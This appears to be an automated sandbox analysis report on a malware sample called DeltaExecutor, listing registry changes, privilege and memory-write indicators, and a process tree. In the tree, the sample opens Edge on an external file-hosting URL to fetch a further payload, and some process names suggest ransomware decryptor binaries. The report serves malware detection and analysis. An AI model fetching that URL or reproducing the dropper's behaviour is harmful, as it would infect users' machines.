regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gz regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.bgz\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bgz regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000\Version = "369164288" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\EzExtractPro.Archive regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\EzExtractPro.Archive\DefaultIcon\ = "\"C:\\Program Files (x86)\\EzExtractPro\\EzExtractProShell.dll\",-107" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0420722210000010000000\ProductName = "7-Zip 22.01 (x64 edition)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\InProcServer32\ThreadingModel = "Both" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.cab\shellex\ContextMenuHandlers regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tar\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.xz regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.xz\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bgz\shellex regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ManualSafeSave = "1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zip\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.7z\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.iso regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.xz\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zst\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zst\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gz\shellex regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.rar\shellex\ContextMenuHandlers regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bz2\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.iso\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.gz\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zip\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bz2\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bz2\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.cab regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jar\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lzh regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.x\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell EzExtractProApp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0420720000000040000000\96F071321C0420722210000010000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.7z\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ = "EzExtractPro Context Menu Handler" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.iso\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.jar\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lz\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.zipx\shellex\ContextMenuHandlers regsvr32.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2160 reg.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 127855.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 453621.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 736431.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 648963.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 864517.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1936 powershell.exe 1936 powershell.exe 2752 msedge.exe 2752 msedge.exe 1284 msedge.exe 1284 msedge.exe 2768 msedge.exe 2768 msedge.exe 3364 identity_helper.exe 3364 identity_helper.exe 5220 msedge.exe 5220 msedge.exe 5992 powershell.exe 5992 powershell.exe 5992 powershell.exe 5112 msedge.exe 5112 msedge.exe 2024 msiexec.exe 2024 msiexec.exe 1688 powershell.exe 1688 powershell.exe 1688 powershell.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 5772 msedge.exe 5772 msedge.exe 5604 chrome.exe 5604 chrome.exe 2296 chrome.exe 2296 chrome.exe 2296 chrome.exe 2296 chrome.exe 3948 taskhsvc.exe 3948 taskhsvc.exe 3948 taskhsvc.exe 3948 taskhsvc.exe 3948 taskhsvc.exe 3948 taskhsvc.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe 4616 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 1112 7zFM.exe 5176 EzExtractProApp.exe 6040 @[email protected] 4616 taskmgr.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs
pid Process 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1112 7zFM.exe Token: 35 1112 7zFM.exe Token: SeSecurityPrivilege 1112 7zFM.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeIncreaseQuotaPrivilege 1936 powershell.exe Token: SeSecurityPrivilege 1936 powershell.exe Token: SeTakeOwnershipPrivilege 1936 powershell.exe Token: SeLoadDriverPrivilege 1936 powershell.exe Token: SeSystemProfilePrivilege 1936 powershell.exe Token: SeSystemtimePrivilege 1936 powershell.exe Token: SeProfSingleProcessPrivilege 1936 powershell.exe Token: SeIncBasePriorityPrivilege 1936 powershell.exe Token: SeCreatePagefilePrivilege 1936 powershell.exe Token: SeBackupPrivilege 1936 powershell.exe Token: SeRestorePrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeSystemEnvironmentPrivilege 1936 powershell.exe Token: SeRemoteShutdownPrivilege 1936 powershell.exe Token: SeUndockPrivilege 1936 powershell.exe Token: SeManageVolumePrivilege 1936 powershell.exe Token: 33 1936 powershell.exe Token: 34 1936 powershell.exe Token: 35 1936 powershell.exe Token: 36 1936 powershell.exe Token: SeIncreaseQuotaPrivilege 1936 powershell.exe Token: SeSecurityPrivilege 1936 powershell.exe Token: SeTakeOwnershipPrivilege 1936 powershell.exe Token: SeLoadDriverPrivilege 1936 powershell.exe Token: SeSystemProfilePrivilege 1936 powershell.exe Token: SeSystemtimePrivilege 1936 powershell.exe Token: SeProfSingleProcessPrivilege 1936 powershell.exe Token: SeIncBasePriorityPrivilege 1936 powershell.exe Token: SeCreatePagefilePrivilege 1936 powershell.exe Token: SeBackupPrivilege 1936 powershell.exe Token: SeRestorePrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeSystemEnvironmentPrivilege 1936 powershell.exe Token: SeRemoteShutdownPrivilege 1936 powershell.exe Token: SeUndockPrivilege 1936 powershell.exe Token: SeManageVolumePrivilege 1936 powershell.exe Token: 33 1936 powershell.exe Token: 34 1936 powershell.exe Token: 35 1936 powershell.exe Token: 36 1936 powershell.exe Token: SeIncreaseQuotaPrivilege 1936 powershell.exe Token: SeSecurityPrivilege 1936 powershell.exe Token: SeTakeOwnershipPrivilege 1936 powershell.exe Token: SeLoadDriverPrivilege 1936 powershell.exe Token: SeSystemProfilePrivilege 1936 powershell.exe Token: SeSystemtimePrivilege 1936 powershell.exe Token: SeProfSingleProcessPrivilege 1936 powershell.exe Token: SeIncBasePriorityPrivilege 1936 powershell.exe Token: SeCreatePagefilePrivilege 1936 powershell.exe Token: SeBackupPrivilege 1936 powershell.exe Token: SeRestorePrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeSystemEnvironmentPrivilege 1936 powershell.exe Token: SeRemoteShutdownPrivilege 1936 powershell.exe Token: SeUndockPrivilege 1936 powershell.exe Token: SeManageVolumePrivilege 1936 powershell.exe Token: 33 1936 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1112 7zFM.exe 1112 7zFM.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 1284 msedge.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe 5604 chrome.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 2812 DeltaExecutor.exe 5328 EzExtractSetup.exe 5712 EzExtractSetup.exe 5176 EzExtractProApp.exe 5776 DeltaExecutor.exe 3680 DeltaExecutor.exe 3472 DeltaExecutor.exe 4792 @[email protected] 4792 @[email protected] 2688 @[email protected] 2688 @[email protected] 6040 @[email protected] 6040 @[email protected] 4288 @[email protected] 4488 @[email protected] 5936 @[email protected] 1904 @[email protected] 3884 @[email protected] 3884 @[email protected] 4500 @[email protected] 1448 @[email protected] 1448 @[email protected] 4760 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2812 wrote to memory of 1284 2812 DeltaExecutor.exe 98 PID 2812 wrote to memory of 1284 2812 DeltaExecutor.exe 98 PID 2812 wrote to memory of 1936 2812 DeltaExecutor.exe 99 PID 2812 wrote to memory of 1936 2812 DeltaExecutor.exe 99 PID 1284 wrote to memory of 116 1284 msedge.exe 100 PID 1284 wrote to memory of 116 1284 msedge.exe 100 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 1528 1284 msedge.exe 102 PID 1284 wrote to memory of 2752 1284 msedge.exe 103 PID 1284 wrote to memory of 2752 1284 msedge.exe 103 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 PID 1284 wrote to memory of 1732 1284 msedge.exe 104 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5908 attrib.exe 1196 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1112
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3556
-
C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg12⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffdca946f8,0x7fffdca94708,0x7fffdca947183⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:23⤵PID:1528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:83⤵PID:1732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:13⤵PID:2492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:13⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:13⤵PID:2220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5216 /prefetch:83⤵PID:456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5520 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:13⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6744 /prefetch:83⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6744 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5884 /prefetch:83⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵PID:2064
-
-
